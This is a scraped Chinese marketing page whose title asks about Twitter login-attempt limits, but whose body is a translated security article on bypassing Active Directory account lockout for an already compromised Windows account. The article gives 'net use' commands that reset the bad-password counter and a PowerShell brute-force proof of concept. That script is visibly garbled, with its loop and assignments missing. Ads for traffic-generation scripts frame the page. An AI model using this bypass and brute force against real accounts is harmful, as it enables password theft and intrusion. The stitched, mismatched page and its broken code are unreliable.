需要脚本演示、定制部署或海外获客方案?访问 Facebook18 官网
首页 / twitter引流推广

推特超过了尝试次数怎么办啊(推特超过允许尝试次数怎么办)

2023-01-13twitter引流推广静态 HTML 文章

未标题-1-4 (1).png

这篇文章仅出于教育目的,请勿在不属于你的计算机上进行安全测试。

从日常攻防角度来看,一旦攻击者通过网络钓鱼或者远程代码执行等漏洞获得了受害者的计算机权限后,通常是以服务或用户的身份存在于计算机中。此时,他们往往会面临这样一个问题,虽然有权限,但却不知道密码。

获取密码的方式有很多种,例如使用Mimikatz以及搜索一些机器上的敏感文件来进行推测。而这篇文章我将介绍一种古老的方法,暴力破解,主要以某个用户为目标。但是,微软对帐户的登录尝试是有错误次数限制的。所以要顺利进行暴力破解,需要绕过这个限制。而我发现,在已通过身份验证的情况下,只要运行net use \\\\%computername% /u:%username%,就能重新进行身份验证并重置错误尝试的次数。

想更详细的了解此操作,可从Microsoft下载远程服务器管理工​​具:https://www.microsoft.com/en-us/download/details.aspx?id=45520

安装该工具后,你可以运行以下powershell命令,它会显示我的JoeUser帐户的当前错误尝试次数。

get-aduser -filter * -prop lastbadpasswordattempt, badpwdcount, lockedout | select name, lastbadpasswordattempt, badpwdcount,lockedout | format-table -auto

在我的本地策略中,你可以看到我设置在3次无效登录后锁定帐户。

现在我故意输入错误的密码,让机器记录下这个错误的密码尝试。所使用的命令为net use \\\\%computername% “FakePassword” /u:joeuser。 出于某种原因,我可以看到两次错误的密码尝试,我还有另一种方法,可以看到只有一次错误的密码尝试,当然这无关大雅。

现在,我使用上述提及的命令清除错误的密码尝试次数Net use \\\\%computername% /u:%username%。大家可以看到,此时我的命令中并没有密码。在我已拥有某用户的权限下,我可随意清除错误的密码尝试次数!

现在,我可以使用这种技术无限制地破解密码。唯一的问题是如果你想用Net use破解密码,我必须在每次使用重置命令后删除共享。例如,现在我已经进行了共享设置,如果我尝试破解密码,就会收到如下消息:

为了清除共享,只能使用Net Use /Delete \\\\%computername%

以下是一个PoC。我使用Daniel Miesslers SecLists中前10000名密码组成字典,去尝试破解。我把我的代码和字典放在了C:\\Users\\Public目录下,具体如下:

$userVar = Get-ChildItem env:username$uname = $userVar.Value$computerVar = Get-ChildItem env:computername$computerName = $computerVar.Value$ErrorActionPreference = “Stop”$hooray = “PasswordNotFoun”$CurrentPath = “C:\\Users\\Public”$FileName = “10-million-password-list-top-10000.txt”$FName= “$CurrentPath\\$FileName”foreach){$passAttempt = try{Write-Output $output = Invoke-expression $passAttempt | Out-Null$hooray = $valuewrite-output $reset = Invoke-expression $reset | Out-Null$deleteShare = Invoke-expression $deleteShare | Out-Nullbreak}catch{$reset = Invoke-expression $reset | Out-Null$deleteShare = Invoke-expression $deleteShare | Out-Null}}write-host “The Password is: “ $hooray

我的脚本正在破解用户密码。

是的,被破解帐户地错误密码尝试次数一直是0!

虽然不快但很有效。在我发现这个问题后,我将此作为一个漏洞提交给Microsoft,但他们不认为这是一个安全漏洞。

请随时在Twitter上关注我@_markmo_,我将随时分享我学到的知识。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

原文:https://medium.com/@markmotig/bypassing-ad-account-lockout-for-a-compromised-account-5c908d663de8

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

海外精品引流脚本–最强海外引流  

官网:www.facebook18.com

唯一TG:https://t.me/Facebook181818

Facebook.png

查看演示与获取方案

读完本篇后,可通过下方入口查看演示视频、联系客服或访问主站。